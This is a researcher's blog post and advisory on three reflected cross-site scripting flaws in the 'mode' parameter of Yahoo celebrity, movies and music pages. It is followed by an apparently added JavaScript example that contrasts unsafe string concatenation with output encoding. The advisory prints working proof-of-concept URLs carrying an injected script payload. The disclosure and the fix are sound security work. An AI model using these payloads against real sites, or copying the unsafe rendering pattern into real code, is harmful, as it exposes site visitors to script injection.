Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
In Jan ’14 I reported three Cross-site Scripting vulnerabilities to the Yahoo Bug Bounty Program. And I know, it is really really hard, but … again … no feedback or bounty :)
Screenshots:
XSS on ‘celebrity.yahoo.com’
XSS on ‘movies.yahoo.com’
XSS on ‘music.yahoo.com’
Here is the advisory:
Advisory: Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities
Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 / YahooBB-006
Author: Stefan Schurtz
Affected Software: Successfully tested on celebrity.yahoo.com, movies.yahoo.com, music.yahoo.com
Vendor URL:
Vendor Status: Not tested anymore
Bounty: nothing
======================
Vulnerability Description
======================
The ‘mode’ parameter on "https://celebrity.yahoo.com/", "https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a Cross-site Scripting vulnerability.
======================
PoC-Exploit
======================
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
======================
Disclosure Timeline
======================
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)
======================
Credits
======================
Vulnerabilities found and advisory written by Stefan Schurtz.
======================
References
======================
http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
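The PoC value multipart"-alert(document.domain)-" has the shape of input that closes a double-quoted JavaScript string, which suggests the 'mode' parameter was reflected into an inline script. The following is an added example, not part of the original advisory and not Yahoo's code: it shows that reflection pattern beside an output-encoded version. The pageConfig template, the function names and the stub host site.example are assumptions.

```javascript
// Added illustration; the inline-script template and all names are assumptions.
const PAYLOAD = 'multipart"-alert(document.domain)-"'; // mode value from the PoC URLs

// Before: the parameter is concatenated into a double-quoted JS string.
function renderUnsafe(mode) {
  return 'var pageConfig = {mode: "' + mode + '"};';
}

// After: serialize the value as a JS string literal. JSON.stringify escapes
// " and \ ; the characters <, >, & and U+2028/U+2029 are escaped as well so
// the value cannot close the surrounding <script> element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSafe(mode) {
  return 'var pageConfig = {mode: ' + jsStringLiteral(mode) + '};';
}

// Run a rendered script body with stubbed alert() and document objects, and
// report what mode ended up holding and whether an injected call executed.
function evaluate(scriptBody) {
  const calls = [];
  const run = new Function('alert', 'document',
    scriptBody + '\nreturn pageConfig.mode;');
  const mode = run(arg => { calls.push(arg); return 0; },
    { domain: 'site.example' });
  return { mode, alertCalls: calls };
}

console.log('unsafe:', evaluate(renderUnsafe(PAYLOAD)));
console.log('safe:  ', evaluate(renderSafe(PAYLOAD)));
```

In the unsafe rendering the stubbed alert() runs and mode is no longer a string; in the encoded rendering the whole parameter value stays data.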